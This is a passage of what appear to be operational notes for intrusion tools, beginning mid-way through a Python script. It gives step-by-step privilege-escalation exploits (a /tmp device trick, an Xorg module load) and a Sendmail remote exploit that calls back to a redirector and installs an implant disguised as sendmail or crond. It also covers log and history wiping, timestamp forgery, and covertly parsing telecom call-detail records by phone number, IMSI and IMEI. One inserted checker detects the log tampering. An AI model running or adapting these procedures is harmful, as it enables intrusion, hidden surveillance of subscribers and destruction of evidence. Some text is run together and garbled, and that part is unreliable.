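SAMPLE_BASELINE = {"/dev/hda1": 6, "/dev/hdb3": 6}
SAMPLE_AFTER_CLEANUP = [("/dev/hdb3", stat.S_IFBLK | 0o660, 0)]

if __name__ == "__main__":
    for finding in check_entries(collect_entries(), allowed_gids()):
        print("%s: %s" % finding)
```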
### OPSEC: vulnerability - public
### NOTE: This will cause a temporary CPU spike during execution; care should be taken
### to determine the risk if there are active users on the target
###
### Get a "before" picture of the device where /tmp resides
###
# find the device that is mounted on /tmp (ex.- /dev/hdb3) and make note;
# if /tmp does not have its own filesystem, use the device of "/"
df -k
# look at the perms of the DEVICE, then make note of the group id; typically should be "disk"
# ex: -ls /dev/hdb3
-ls
# correlate the groupid to a digit by finding it in /etc/group, then save the numeric value
# ex: -grep disk /etc/group
-grep /etc/group
###
### upload and execute
###
-put /current/up/exze exze
# run the script (within nopen, use -shell)
-shell ./exze
### A status code will show up while the program is running.
### The following value should indicate potential success: 0x000
### The gid that follows it should be the same as the one you found in the initial checks
### MAKE NOTE OF THE VALUE REPORTED BACK ON THIS INITIAL ATTEMPT IN CASE OF FAILURE!!!
### Any value other than 0x000 is an error code (see other documentation)
### Wait about 5 minutes (for the cache flushing) and you should get a root prompt, then:
unset HISTFILE
unset HISTSIZE
unset HISTFILESIZE
id
# start a new noserver
PATH=. crond
###
### IF AT FIRST YOU DON'T SUCCEED....... try, try..... the following in order:
###
### If you received an error that permissions didn't change, you may try again.
### Next, try using the -r option. This option will prevent the temporary shell
### file from being removed if there is an error so that the operator will have a chance
### to do the cache flushing manually.
-shell ./exze -r
### if successful, run the "unset"s from above - you have root and can cleanup
### If the 'permissions didn't change' error still happens, the flushing procedure
### will need to be performed manually before proceeding to the next step.
find / -type f -exec cat {} \; > /dev/null
### ONLY AFTER the 'find' completes, check the permissions of the shell file in /tmp:
### should be rws--x--- and owned by root
### DO NOT EXECUTE, OPEN, READ, OR WRITE TO THE SHELL FILE BEFORE THE EXPLOIT FINISHES
### AS IT MIGHT UNDO THE CHANGES MADE TO THE DISK!! THIS MEANS DO NOT DO AN LS
### ON THE FILE OR TOUCH IT IN ANY MANNER UNTIL THE EXPLOIT COMPLETES.
-lt /tmp
### if the permissions have changed, then manually attempt to get a root shell;
### the -d and -i options will attempt to perform the cleanup of the shell file in /tmp
### and reset the group perms of the DEVICE
-lt /tmp
-shell /tmp/file<######> -d -i
### if you don't get root by now, you probably won't
###
### CLEANUP
###
### no cleanup if successful the first time, however....
### there may be cleanup involved under the following conditions:
### the exploit did NOT work on the first attempt
### the exploit was aborted
### the connection to target was dropped
### check the group id of the DEVICE where /tmp resides;
### if the group is not the same as it was originally, set it to
### the gid echoed back in your INITIAL ATTEMPT (digit following 0x000)
### NOTE: if you didn't get root, you may not be able to chgrp the device
### but hopefully, the exploit will have set it to gid '0' to be
### less conspicuous than that of your user's gid
-lt /dev/
chgrp /dev/
-lt /dev
# the shell file (/tmp/file######) may need to be cleaned up on target:
-lt /tmp
-rm /tmp/file*
# remove the binary from /tmp
-rm exze
###
### END File user.tool.expitiatezeke.COMMON
### (see also ../etc/user.tool.expitiatezeke.COMMON)
###
### BEGIN File user.tool.englandbogy.COMMON (see also ../etc/user.tool.englandbogy.COMMON)
###
#######################################
# ENGLANDBOGY
#######################################
### local exploit against Xorg for the following versions:
### Xorg X11R7 1.0.1, X11R7 1.0, X11R6 6.9
### Includes the following distributions:
### MandrakeSoft Linux 10.2,
### Ubuntu 5.0.4, SuSE Linux 10.0,
### RedHat Fedora Core5, MandrakeSoft Linux 2006.0
### Fails-on - Xorg X11R7 1.0.2 and greater and less than Xorg X11R6 6.9.
### Requirements - Target needs to have the Xorg binary as SETUID root.
###
### Exploits the Xorg X server by allowing unprivileged users to load arbitrary modules
### OPSEC:
### vulnerability: public
### exploit: public
### Determine if vulnerable:
uname -a
### get Xorg version; should be one listed above:
Xorg -version
### see if Xorg is setuid root- should look similar to this (-rwsr-xr-x )
ls -la /usr/bin/Xorg
### if tests pass, let's do it:
-put /current/up/eb eb
-shell ./eb
# lots of output similar to this:
X Window System Version 6.9.0
Release Date: 21 December 2005
X Protocol Version 11, Revision 0, Release 6.9
Build Operating System: SuSE Linux [ELF] SuSE
Current Operating System: Linux linux 2.6.16-rc5-git2-2-default #1 Tue Feb 28 09:16:17 UTC 2006 i686
Build Date: 26 February 2006
Before reporting problems, check http://wiki.X.Org
to make sure that you have the latest version.
Module Loader present
Markers: (--) probed, (**) from config file, (==) default setting,
(++) from command line, (!!) notice, (II) informational,
(WW) warning, (EE) error, (NI) not implemented, (??) unknown.
(++) Log file: "Xorg.log", Time: Tue Jun 6 10:31:57 2006
(==) Using config file: "/etc/X11/xorg.conf"
(EE) LoadModule: Module bitmap does not have a bitmapModuleData data object.
(EE) Failed to load module "bitmap" (invalid module, 0)
(EE) LoadModule: Module pcidata does not have a pcidataModuleData data object.
(EE) Failed to load module "pcidata" (invalid module, 0)
Fatal server error:
Unable to load required base modules, Exiting...
Please consult the The X.Org Foundation support at http://wiki.X.Org for help.
Please also check the log file at "Xorg.log" for additional information.
### you probably have root now, so do your unsets:
unset HISTFILE
unset HISTSIZE
unset HISTFILESIZE
id
### start a new noserver as root:
PATH=. \
crond
### Connect to nopen:
-nstun TARGET_IP
### CLEANUP:
# no logging
###
### END File user.tool.englandbogy.COMMON
### (see also ../etc/user.tool.englandbogy.COMMON)
###
### BEGIN File user.tool.earlyshovel.COMMON (see also ../etc/user.tool.earlyshovel.COMMON)
###
#########################################################
# EARLYSHOVEL
#########################################################
### publicly known vulnerability
### remote exploit available for linux RH7 running sendmail
### Supported targets:
### "ASPRH73": ASP Linux 7.3 or RedHat 7.3 running Sendmail 8.11.6
### "RH70": RedHat 7.0 running Sendmail 8.11.0
### "RH71": RedHat 7.1 running Sendmail 8.11.2
### "RH73": RedHat 7.3 running Sendmail 8.11.6
### requires valid user name (7.1 and 7.3)
### may also require valid domain for (7.3)
mx
:%s/REDIRECTOR_IP/REDIRECTOR_IP/g
:%s/TARGET_IP/TARGET_IP/g
:%s/TARGET_OS/TARGET_OS/g
:%s/USER_NAME/USER_NAME/g
:%s/DOMAIN/DOM<br>AIN/g
:%s/RANDOM_PORT/RANDOM_PORT/g
`x
#banner mail
-scan mail TARGET_IP
# alternate way to banner
##on pitch
-tunnel l 2525 TARGET_IP 25
###local scripted
telnet 127.0.0.1 2525
## after getting banner
helo DOMAIN
mail from: user@DOMAIN # use random user name
### may be getting rejected as spam???
$ ./eash.py -?
usage: /current/bin/earlyshovel/eash.py [options]
options
--atimeout seconds (default = 30) Authentication timeout (in seconds)
--cip IPAddress (default = 127.0.0.1) Callback IP address
--clport port Local callback port
--cport port Callback port
--ctimeout seconds (default = 30) Callback timeout (in seconds)
--domain domainName Domain name of sender
--exec filename File to exec on successful upload
-?
| --help Print the usage message
--recipient emailAddress (default = root) Email recipient
--target target Target OS
--tip IPAddress (default = 127.0.0.1) Target IP address
--tmpnam filename Remote name of the uploaded file (of the form /tmp/fileXXXXXX)(def=filekdBtDF)
--tport port (default = 25) Target port
--upload filename File to upload
Supported targets:
"ASPRH73": ASP Linux 7.3 or RedHat 7.3 running Sendmail 8.11.6
"RH70": RedHat 7.0 running Sendmail 8.11.0
"RH71": RedHat 7.1 running Sendmail 8.11.2
"RH72": RedHat 7.2 running Sendmail 8.11.6
### REDIRECTION
-tunnel l 2525 TARGET_IP 25 r RANDOM_PORT
### LOCAL WINDOW: UPLOADS NOPEN AUTOMATICALLY- as of VERSION 2.4.0
cd /current/bin/earlyshovel
./eash.py --tip 127.0.0.1 --tport 2525 --cip REDIRECTOR_IP --cport RANDOM_PORT --recipient USER_NAME --target TARGET_OS --domain DOMAIN --exec /current/bin/noclient --upload /current/up/morerats/noserver-3.0.3.1-i586.pc.linux.gnu.redhat-5.0
-OR-
### LOCAL WINDOW: MANUAL UPLOAD of NOPEN
cd /current/bin/earlyshovel
./eash.py --tip 127.0.0.1 --tport 2525 --cip REDIRECTOR_IP --cport RANDOM_PORT --recipient USER_NAME --target TARGET_OS
./eash.py --tip 127.0.0.1 --tport 2525 --cip REDIRECTOR_IP --cport RANDOM_PORT --recipient USER_NAME --target TARGET_OS --domain DOMAIN
### you will get an interactive root shell
unset HISTFILE
unset HISTFILESIZE
unset HISTSIZE
id
pwd
w
# upload nopen as sendmail
which uudecode uncompress
mkdir /tmp/.scsi;cd /tmp/.scsi;pwd
# if uudecode/uncompress exists:
# LOCALLY
cd /current/up
cp /current/up/morerats/noserver-3.0.3.1-i586.pc.linux.gnu.redhat-5.0 sendmail
compress sendmail
uuencode sendmail.Z sendmail.Z > sendmail.Z.uu
gedit sendmail.Z.uu
# on TARGET in interactive window
uudecode; ls -la
# copy/paste gedit contents into this window
uncompress sendmail.Z
ls -l
chmod 700 sendmail
PATH=. \
sendmail
# from redirector
-nstun TARGET_IP
###END of MANUAL UPLOAD
###CLEANUP
#if nopen is uploaded automatically:
-ls /tmp/filekdBtDF
-rm /tmp/filekdBtDF
# look where mail may be logged
grep mail /etc/syslog.conf
-tail /var/log/maillog
#remove mail messages from file
grep USER_NAME /var/log/maillog # do this; see if grep will clean everything needed
-gs grepout USER_NAME /var/log/maillog
# if our log entries are the only entries in file
cat /dev/null > /var/log/maillog
#change timestamp of file
-touch /var/log/? /var/log/maillog
#delete mail msgs from users mail dir: path may be different
-lt /var/spool/mail/USER_NAME
-get /var/spool/mail/USER_NAME
#locally
cp /current/down/hostname.IP/var/spool/mail/USER_NAME /current/up/t
cd /current/up/t
#remove email from t
-put /current/up/t t
#target window
#if it looks good
cat t > /var/spool/mail/USER_NAME
# touch file to a "good" date
touch -t YYMMDDHHMM.ss /var/spool/mail/USER_NAME
#does user have a home dir
grep USER_NAME /etc/passwd
# look for users home dir and list it
-lt ?/?/USER_NAME
## look for .procmail or .forward files
cat files if there....
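Added example for the log clean-up steps above, not code from the notes: a Python consistency check over sendmail maillog lines that reports queue ids left with a from= entry but no to= entry, which is what remains after every line naming one recipient has been grepped out. INTACT and TAMPERED are constructed logs.

```python
"""Consistency check over sendmail maillog lines for the clean-up the EARLYSHOVEL
notes describe (every line mentioning USER_NAME grepped out of /var/log/maillog).
Sendmail logs each message under one queue id: a from= line and one or more to=
lines. Removing only the lines that name the recipient leaves from= entries with
no matching to= entry, which this check reports. Added example for this page, not
code from the notes; INTACT and TAMPERED are constructed logs."""
import re
from collections import defaultdict

ENTRY = re.compile(r"^\w{3}\s+\d{1,2} \d\d:\d\d:\d\d \S+ sendmail\[\d+\]: "
                   r"(?P<qid>[A-Za-z0-9]+): (?P<kind>from|to)=")


def queue_index(lines):
    """{queue_id: set of entry kinds seen}, e.g. {'g0CF01A02201': {'from', 'to'}}."""
    seen = defaultdict(set)
    for line in lines:
        m = ENTRY.match(line)
        if m:
            seen[m.group("qid")].add(m.group("kind"))
    return seen


def orphaned_queue_ids(lines):
    """Queue ids with a from= entry but no to= entry. (A to= without a from= can
    also appear legitimately across a log rotation, so only this direction is reported.)"""
    return sorted(q for q, kinds in queue_index(lines).items() if kinds == {"from"})


def check_file(path):
    """Run the check over a maillog on disk."""
    with open(path, "r", errors="replace") as fh:
        return orphaned_queue_ids(fh)


# Constructed sample: two delivered messages, each with its from= and to= entry.
INTACT = [
    "Jan 12 10:00:01 mx1 sendmail[2201]: g0CF01A02201: from=<alice@example.org>, size=1342, class=0, nrcpts=1, msgid=<1@example.org>, proto=SMTP, daemon=MTA, relay=[192.0.2.10]",
    "Jan 12 10:00:02 mx1 sendmail[2203]: g0CF01A02201: to=<bob>, delay=00:00:01, xdelay=00:00:00, mailer=local, pri=31342, dsn=2.0.0, stat=Sent",
    "Jan 12 10:05:40 mx1 sendmail[2290]: g0CF05e02290: from=<carol@example.org>, size=980, class=0, nrcpts=1, msgid=<2@example.org>, proto=SMTP, daemon=MTA, relay=[192.0.2.11]",
    "Jan 12 10:05:41 mx1 sendmail[2292]: g0CF05e02290: to=<dave>, delay=00:00:01, xdelay=00:00:00, mailer=local, pri=30980, dsn=2.0.0, stat=Sent",
]
# The same log after every line naming 'dave' was removed: the second message keeps
# its from= entry but has lost its to= entry.
TAMPERED = INTACT[:3]

if __name__ == "__main__":
    print("intact:", orphaned_queue_ids(INTACT))
    print("tampered:", orphaned_queue_ids(TAMPERED))
```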
###
### END File user.tool.earlyshovel.COMMON
### (see also ../etc/user.tool.earlyshovel.COMMON)
###
### BEGIN File user.tool.curserazor.COMMON (see also ../etc/user.tool.curserazor.COMMON)
###
################ CURSERAZOR #########################
############### PARSING ###################################################################
### vi Search/Replace commands
###
### ProjectName - self explanatory
### Date field - today's date, used for output files
### Host - hostname of the box (not IP address)
### Cryptkey - encryption key (use output from below md5sum command)
md5sum /current/down/tcpdump.raw
mx
:%s/PROJECTNAME/PROJECTNAME/g
:%s/DDMonYY/DDMonYY/g
:%s/HOST/HOST/g
:%s/CRYPTKEY/CRYPTKEY/g
'x
### Save the encryption key locally:
echo CRYPTKEY > /current/down/cryptkey.curserazor.DDMonYY
####### Prepare files containing numbers to search for:
# if files containing the numbers to search are available:
mkdir /current/down/argfiles
cd /current/down/argfiles
mz
cp /mnt/zip*/arg* /current/down/argfiles
#or
cp /mnt/zip*/PROJECTNAME/arg* /current/down/argfiles
ls -altr
### Prep the argfiles:
### make sure the files are ASCII and contain NO EMPTY LINES!!
### make sure the last line does not contain a null character at the end
### (vi the file, add a carriage return to the last line, then delete the empty
### line and save)
### "file" results:
### This will not work: ASCII text, with CRLF line terminators
### This WILL: ASCII text
cat arg*
file arg*
dos2unix arg*
file arg*
# if no data media is provided:
# locally, create a file of numbers to grep for with each number on a separate line
# make sure there are NO EMPTY LINES!!!!
# if searching for LACs and cell id's, use the format in the documentation:
# ex. - 410 01 95 18374
# if searching for phone numbers, use the normal format:
# ex. - 4837506
cd /current/down/argfiles
vi /current/down/argfiles/argfile1.txt
### Make sure you can find the cryptTool...add to PATH if which fails...
which cryptTool.v1.0.Linux2.4.18-14.targetdl
### To encrypt one at a time...
cryptTool.v1.0.Linux2.4.18-14.targetdl -i argfile1.txt -o argfile1.enc -k CRYPTKEY -b
cryptTool.v1.0.Linux2.4.18-14.targetdl -i argfile2.txt -o argfile2.enc -k CRYPTKEY -b
file argfile*.enc
### Loop to encrypt all the argfiles (writes argfileN.enc for each argfileN.txt,
### matching the names the -put commands below expect)
cd /current/down/argfiles
for i in argfile*.txt; do cryptTool.v1.0.Linux2.4.18-14.targetdl -i $i -o ${i%.txt}.enc -k CRYPTKEY -b; done
file argfile*.enc
########## To look at CDR directories try the following:
### Use the following commands to determine the location of current
### CDR data storage; Once you identify the location of the data, you'll
### use the head/tail commands to determine the date ranges being saved.
### These date ranges will be used as args in the curserazor commands.
### Typical file locations per host:
##########################
hazyrazor: # paths based on isb-ser-imelive 172.20.16.136
ls -l /ImE/data05_loc/DATA_5.0/OUTPUT/MSC/ARCHIVE/*200710*GCDR$ | wc
ls -l /ImE/data05_loc/DATA_5.0/OUTPUT/MSC/ARCHIVE/ | grep 200710.*GCDR$ | head -30
ls -l /ImE/data05_loc/DATA_5.0/OUTPUT/MSC/ARCHIVE/ | grep 200710.*GCDR$ | tail -30
### Tips for running the CURSERAZOR 1.1
### DO NOT _APPEND_ to the local file if using encryption - (no >>L: or >>T: )!!!!
### per each argfile, create .enc1, .enc1.more, .enc1.more2, etc if additional
### passes are needed for the date range
### The phone list is deleted automatically
######## Upload the parser (CURSERAZOR) and call it nscd
# put up the parser tool
# First, using a wildcard, confirm our hidden directory (and that we are privileged)
-ctrl -d
# or maybe something like this?
-ls /lib/.02dbb*
# Now (using the full path, this wildcard will fail), cd there and add it to our path
-cd /lib/.02dbb*
-addpath .
# Put up the tool as nscd
-put /current/up/curserazor.v1.1.SunOS5.10.targetdl nscd
which nscd
-lt
-setenv B=-k CRYPTKEY -z "find /ImE/data05_loc/DATA_5.0/OUTPUT/MSC/ARCHIVE/ -name '*2007103*GCDR' -print" -P ./awk
-ls -t
which nscd
##### Upload the encrypted phone list as awk, modify each parser command to have the
##### correct directory and date range of files to parse, then run the parser:
##### NOTE: MUST CORRELATE NUMBERS IN ENCRYPTED TASKING FILENAMES (i.e. argfile1.enc)
##### TO OUTPUT FILENAMES (cdrhits*.enc1, cdrhits*.enc1.more, cdrhits*.enc1.more2, etc.)
##### NOTE2: GO FROM MOST RECENT TIME TO (PROBABLY CURRENT DATE) AS FAR BACK AS TIME ALLOWS
############ argfile 1
-put /current/down/argfiles/argfile1.enc awk
-setenv B=-k CRYPTKEY -z "find /ImE/data05_loc/DATA_5.0/OUTPUT/MSC/ARCHIVE/ -name '*2007103*GCDR' -print" -P ./awk
nscd >T:/current/down/cdrhits.curserazor.HOST.DDMonYY.enc1
-beep 15
### Run again if needed for same tasking
-put /current/down/argfiles/argfile1.enc awk
-setenv B=-k CRYPTKEY -z "find /ImE/data05_loc/DATA_5.0/OUTPUT/MSC/ARCHIVE/ -name '*2007102[89]*GCDR' -print" -P ./awk
./nscd >T:/current/down/cdrhits.curserazor.HOST.DDMonYY.enc1.more
-beep 15
############ argfile 2
-put /current/down/argfiles/argfile2.enc awk
-setenv B=-k CRYPTKEY -z "find /ImE/data05_loc/DATA_5.0/OUTPUT/MSC/ARCHIVE/ -name '*2007103*GCDR' -print" -P ./awk
nscd >T:/current/down/cdrhits.curserazor.HOST.DDMonYY.enc2
-beep 15
### Run again if needed for same tasking
-put /current/down/argfiles/argfile2.enc awk
-setenv B=-k CRYPTKEY -z "find /ImE/data05_loc/DATA_5.0/OUTPUT/MSC/ARCHIVE/ -name '*2007102[89]*GCDR' -print" -P ./awk
./nscd >T:/current/down/cdrhits.curserazor.HOST.DDMonYY.enc2.more
-beep 15
############ argfile 3 (tasking file number and output suffix must match, per NOTE above)
-put /current/down/argfiles/argfile3.enc awk
-setenv B=-k CRYPTKEY -z "find /ImE/data05_loc/DATA_5.0/OUTPUT/MSC/ARCHIVE/ -name '*2007103*GCDR' -print" -P ./awk
nscd >T:/current/down/cdrhits.curserazor.HOST.DDMonYY.enc3
-beep 15
### Run again if needed
for same tasking -put /current/down/argfiles/argfile2.enc awk -setenv B=-k CRYPTKEY -z "find /ImE/data05_loc/DATA_5.0/OUTPUT/MSC/ARCHIVE/ -name '*2007102[89]*GCDR' -print" -P ./awk ./nscd >T:/current/down/cdrhits.curserazor.HOST.DDMonYY.enc2.more -beep 15 ###### ###### survey mode: ###### ### checks for IMEIs that have more than one IMSI associated with it: ### to limit amount of memory used, replace "-x" with "-X numberBytes" -setenv B=-k CRYPTKEY -z "find /ImE/data05_loc/DATA_5.0/OUTPUT/MSC/ARCHIVE/ -name '*2007102[89]*GCDR' -print" -x ./nscd >T:/current/down/cdrhits.curserazor.HOST.DDMonYY.enc.surveyIMEI ### generates a list of Cell IDs associated with each MSC address: ### to limit amount of memory used, replace "-y" with "-Y numberBytes" -setenv B=-k CRYPTKEY -z "find /ImE/data05_loc/DATA_5.0/OUTPUT/MSC/ARCHIVE/ -name '*2007102[89]*GCDR' -print" -y ./nscd >T:/current/down/cdrhits.curserazor.HOST.DDMonYY.enc.surveyMSC ###### ##### when it's done running, decrypt the file (-d -c options) ###### cd /current/down ls -latr cdrhits*enc* # to decrypt individually: cryptTool.v1.0.Linux2.4.18-14.targetdl -i cdrhits.curserazor.HOST.DDMonYY.enc1 -o cdrhits.curserazor.HOST.DDMonYY.txt1 -k CRYPTKEY -d -c cryptTool.v1.0.Linux2.4.18-14.targetdl -i cdrhits.curserazor.HOST.DDMonYY.enc2 -o cdrhits.curserazor.HOST.DDMonYY.txt2 -k CRYPTKEY -d -c # or decrypt all at one time (once all are written fully) cd /current/down for i in cdrhits*enc* ; do n="`echo $i | sed \"s,enc,txt,g\"`" ; cryptTool.v1.0.Linux2.4.18-14.targetdl -i $i -o $n -k CRYPTKEY -d -c ; done ls -latr cdr*txt* ###### ###### If you need to stop the parser before it completes: ### Control-C the nopen window containing the parser command ### ps -ef |grep nscd ### if the parser command is still "running", then kill the process: ### kill -9 ### You'll still be able to decrypt the partially completed data pull ###### ###### copy DECRYPTED data to media ###### ls -l cdrhits*txt* mz cp cdrhits*txt* /mnt/zip*/PROJECTNAME ls 
-l /mnt/zip*/PROJECTNAME uz ##### ##### clean up ##### -rm nscd awk -lt -cd /tmp -lt w ps -ef | sort -lt / -burnBURN ### ### END File user.tool.curserazor.COMMON ### (see also ../etc/user.tool.curserazor.COMMON) ### ### BEGIN File user.tool.cursehappy.preversion4.COMMON (see also ../etc/user.tool.cursehappy.preversion4.COMMON) ### ################ CURSEHAPPY ######################### ############### PARSING ################################################################### ### vi Search/Replace commands ### ### ProjectName - self explanatory ### Date field - today's date, used for output files ### Rec type - record type correlates with ProjectName, valid values: eh, ls, ss, wb ### Host - hostname of the box (not IP address) ### Cryptkey - encryption key (use output from below md5sum command) md5sum /current/down/tcpdump.raw mx :%s/PROJECTNAME/PROJECTNAME/g :%s/DDMonYY/DDMonYY/g :%s/RECTYPE/RECTYPE/g :%s/HOST/HOST/g :%s/CRYPTKEY/CRYPTKEY/g 'x ### Save the encryption key locally: echo CRYPTKEY > /current/down/cryptkey.cursehappy.DDMonYY ####### Prepare files containing numbers to search for: # if files containing the numbers to search available: mkdir /current/down/argfiles cd /current/down/argfiles mz cp /mnt/zip*/arg* /current/down/argfiles #or cp /mnt/zip*/PROJECTNAME/arg* /current/down/argfiles ls -altr ### Prep the argfiles: ### make sure the files are ASCII and contain NO EMPTY LINES!! ### make sure the last line does not contain a null character at the end ### (vi the file, add a carriage return to the last line, then delete the empty ### line and save) ### "file" results: ### This will not work: ASCII text, with CRLF line terminators ### This WILL: ASCII text cat arg* file arg* dos2unix arg* file arg* # if no data media is provided: # locally, create a file of numbers to grep for with each number on a separate line # make sure there are NO EMPTY LINES!!!! 
# Format of each type of argument:
#   p123456789 - phone number
#   s123456789 - IMSI
#   e123456789 - IMEI
#   c123/456   - Cell/LAC (no leading 0's)
cd /current/down/argfiles
vi /current/down/argfiles/argfile1.txt

########## To look at CDR directories try the following:
### Use the following commands to determine the location of current
### CDR data storage. Once you identify the location of the data, you'll
### use the head/tail commands to determine the date ranges being saved.
### These date ranges will be used as args in the cursehappy commands.
### Typical file locations per host:
########################## wholeblue:
# tpmw01 10.3.4.55
# tpmw02 10.3.4.56
### verifies isb, khi, and lhr directories:
ls -ld /tp/med/datastore/collect/siemens_msc_*
ls -ld /tp/med/datastore/collect/siemens_msc_*/.tmp_ncr
ls -ld /tp/med/archive/collect/siemens_msc_*
ls -ld /tp/med/archive/collect/siemens_msc_*/.tmp_ncr
### shows oldest and newest files in directories:
ls -latr /tp/med/datastore/collect/*isb*/*.MSC | head -10
ls -latr /tp/med/datastore/collect/*isb*/*.MSC | tail -10
ls -latr /tp/med/datastore/collect/*khi*/*.MSC | head -10
ls -latr /tp/med/datastore/collect/*khi*/*.MSC | tail -10
ls -latr /tp/med/datastore/collect/*lhr*/*.MSC | head -10
ls -latr /tp/med/datastore/collect/*lhr*/*.MSC | tail -10
ls -latr /tp/med/datastore/collect/*isb*/.tmp_ncr/*.MSC | head -10
ls -latr /tp/med/datastore/collect/*isb*/.tmp_ncr/*.MSC | tail -10
ls -latr /tp/med/datastore/collect/*khi*/.tmp_ncr/*.MSC | head -10
ls -latr /tp/med/datastore/collect/*khi*/.tmp_ncr/*.MSC | tail -10
ls -latr /tp/med/datastore/collect/*lhr*/.tmp_ncr/*.MSC | head -10
ls -latr /tp/med/datastore/collect/*lhr*/.tmp_ncr/*.MSC | tail -10
ls -latr /tp/med/archive/collect/siemens_msc_isb01/*.MSC | head -10
ls -latr /tp/med/archive/collect/siemens_msc_isb01/*.MSC | tail -10
ls -latr /tp/med/archive/collect/siemens_msc_khi01/*.MSC | head -10
ls -latr /tp/med/archive/collect/siemens_msc_khi01/*.MSC | tail -10
ls -latr /tp/med/archive/collect/siemens_msc_lhr01/*.MSC | head -10
ls -latr /tp/med/archive/collect/siemens_msc_lhr01/*.MSC | tail -10
ls -latr /tp/med/archive/collect/siemens_msc_isb01/.tmp_ncr/*.MSC | head -10
ls -latr /tp/med/archive/collect/siemens_msc_isb01/.tmp_ncr/*.MSC | tail -10
ls -latr /tp/med/archive/collect/siemens_msc_khi01/.tmp_ncr/*.MSC | head -10
ls -latr /tp/med/archive/collect/siemens_msc_khi01/.tmp_ncr/*.MSC | tail -10
ls -latr /tp/med/archive/collect/siemens_msc_lhr01/.tmp_ncr/*.MSC | head -10
ls -latr /tp/med/archive/collect/siemens_msc_lhr01/.tmp_ncr/*.MSC | tail -10
# isbapro1 10.5.7.51
# nothing new
-lt /u01/product_evdp/evident/data_store/collect
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc | head -10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc | tail -10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_khi01 | head -10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_khi01 | tail -10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_isb01 | head -10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_isb01 | tail -10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_lhr01 | head -10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_lhr01 | tail -10
-lt /u03/archive/collect
# newer stuff
ls -latr /u03/archive/collect/siemens_msc_isb01 | head -10
ls -latr /u03/archive/collect/siemens_msc_isb01 | tail -10
ls -latr /u03/archive/collect/siemens_msc_isb01 | wc -l
# old stuff:
ls -latr /u03/archive/collect/siemens_msc_khi01 | head -10
ls -latr /u03/archive/collect/siemens_msc_khi01 | tail -10
########################## editionhaze:
ls -latr /u06/saba/CDR/out/MS* | head -10
ls -latr /u06/saba/CDR/out/MS* | tail -10
ls -latr /u06/saba/CDR/out/MS* | wc -l
########################## liquidsteel:
########################## sicklestar:
### magnum: CURSEHAPPY not working on all SS .usd files :-(
### Try these first, should be all of them in one spot
ls -latr /usd_archive/mc_storage/*usd | head -10
ls -latr /usd_archive/mc_storage/*usd | tail -10
### If none in previous ones...
ls -latr /sys1/var/billing/out_coll/*usd | head -10
ls -latr /sys1/var/billing/out_coll/*usd | tail -10
ls -latr /sys1/var/alcatel/out_coll/*usd | head -10
ls -latr /sys1/var/alcatel/out_coll/*usd | tail -10
ls -latr /sys1/var/billing/msc_is2 | tail -20

########################## CURSEHAPPY ########################################################
###############################################################################################
### Now, encrypt the ascii list...first make sure you have the encryption tool:
which cryptTool.v1.0.Linux2.4.18-14.targetdl
### If cryptTool is not in PATH, change your PATH or insert the full path in the command
### to encrypt one at a time...skip to the next comment to encrypt all at once:
cryptTool.v1.0.Linux2.4.18-14.targetdl -i argfile1.txt -o argfile1.enc -k CRYPTKEY -b
cryptTool.v1.0.Linux2.4.18-14.targetdl -i argfile2.txt -o argfile2.enc -k CRYPTKEY -b
file argfile*.enc
### to encrypt all at the same time (match only the .txt files so a rerun does not re-encrypt the .enc files):
for i in argfile*.txt ; do cryptTool.v1.0.Linux2.4.18-14.targetdl -i "$i" -o "$(basename "$i" .txt)".enc -k CRYPTKEY -b ; done
ls -l
file argfile*.enc

### Tips for running CURSEHAPPY 3.2
### DO NOT _APPEND_ to the local file if using encryption (no >>L: or >>T:)!!!!
### per each argfile, create .enc1, .enc1.more, .enc1.more2, etc. if additional
### passes are needed for the date range
### DO NOT use -loglevel if also using >L: or >T: (mixed output corrupts the decryption)
### The phone list is NOT deleted automatically in v3.2;
### remove it between each run as a practice
### Useful options:
###   -n            name of text file containing phone numbers
###   -rt           record type: eh, ls, ss, RECTYPE
###   -files        list of files to parse (can contain wildcards); optional, same as no option
###   -d            output optional fields
###   -all          all record output (no search performed)
###   -loglevel [#] level of info emitted via stderr: 0,1,2,3

######## Upload the parser (CURSEHAPPY) and call it crond
# put up the parser tool
mkdir /tmp/.scsi
-cd /tmp/.scsi
-put /current/up/cursehappy crond
# or
-put /mnt/zip*/cursehappy crond

##### Upload the encrypted phone list as adm, modify each parser command to have the
##### correct directory and date range of files to parse, then run the parser:
##### NOTE: MUST CORRELATE NUMBERS IN ENCRYPTED TASKING FILENAMES (i.e. argfile1.enc)
##### TO OUTPUT FILENAMES (cdrhits*.enc1, cdrhits*.enc1.more, cdrhits*.enc1.more2, etc.)
##### NOTE2: GO FROM THE MOST RECENT TIME (PROBABLY THE CURRENT DATE) AS FAR BACK AS TIME ALLOWS

############ argfile 1
-put /current/down/argfiles/argfile1.enc adm
KEY=CRYPTKEY; export KEY; ./crond -rt RECTYPE -n ./adm -d /CHANGEME/CDRFILES.2006071[3456]* >T:/current/down/cdrhits.cursehappy.HOST.DDMonYY.enc1
-beep 15
### Remove tasking once crond is running
-rm adm
### Run again if needed for same tasking
-put /current/down/argfiles/argfile1.enc adm
KEY=CRYPTKEY; export KEY; ./crond -rt RECTYPE -n ./adm -d /CHANGEME/CDRFILES.2006071[012]* >T:/current/down/cdrhits.cursehappy.HOST.DDMonYY.enc1.more
-beep 15
-rm adm

############ argfile 2
-put /current/down/argfiles/argfile2.enc adm
KEY=CRYPTKEY; export KEY; ./crond -rt RECTYPE -n ./adm -d /CHANGEME/CDRFILES.2006071[3456]* >T:/current/down/cdrhits.cursehappy.HOST.DDMonYY.enc2
-beep 15
### Remove tasking once crond is running
-rm adm
### Run again if needed for same tasking
-put /current/down/argfiles/argfile2.enc adm
KEY=CRYPTKEY; export KEY; ./crond -rt RECTYPE -n ./adm -d /CHANGEME/CDRFILES.2006071[0-2]* >T:/current/down/cdrhits.cursehappy.HOST.DDMonYY.enc2.more
-beep 15
-rm adm

############ argfile 3
-put /current/down/argfiles/argfile3.enc adm
